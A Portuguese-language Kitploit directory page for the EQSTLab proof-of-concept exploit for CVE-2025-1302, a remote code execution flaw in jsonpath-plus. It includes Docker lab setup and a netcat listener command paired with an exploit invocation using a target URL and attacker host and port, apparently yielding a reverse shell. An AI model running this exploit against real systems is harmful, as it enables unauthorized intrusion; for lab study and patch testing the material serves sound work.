Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1302 — JSONPath-plus Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2025-1302
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus Execução Remota de Código

Ver Repositório
201há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-1302

★ CVE-2025-1302 PoC de RCE do JSONPath-plus ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

Configuração do Laboratório

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

Descrição

Versões do pacote jsonpath-plus anteriores à 10.3.0 são vulneráveis a Execução Remota de Código (RCE) devido à sanitização inadequada de entrada. Um atacante pode executar código arbitrário no sistema ao explorar o uso padrão inseguro do modo eval='safe'. Nota: Isso é causado por uma correção incompleta para CVE-2024-21534.

Como usar

Clonar o repositório

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

Instalar pacotes

root@kitploit:~
pip install -r requirements.txt

Comando

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

Saída

image

Resultado

image

Aviso Legal

Este repositório não se destina a ser um exploit de RCE para o CVE-2025-1302. O objetivo deste projeto é ajudar as pessoas a aprender sobre esta vulnerabilidade e, talvez, testar suas próprias aplicações.

EQST Insight

Publicamos análises de CVEs e malware uma vez por mês. Se você tiver interesse, siga os links abaixo para conferir nossas publicações. https://www.skshieldus.com/eng/business/insight.do

Baixar ferramenta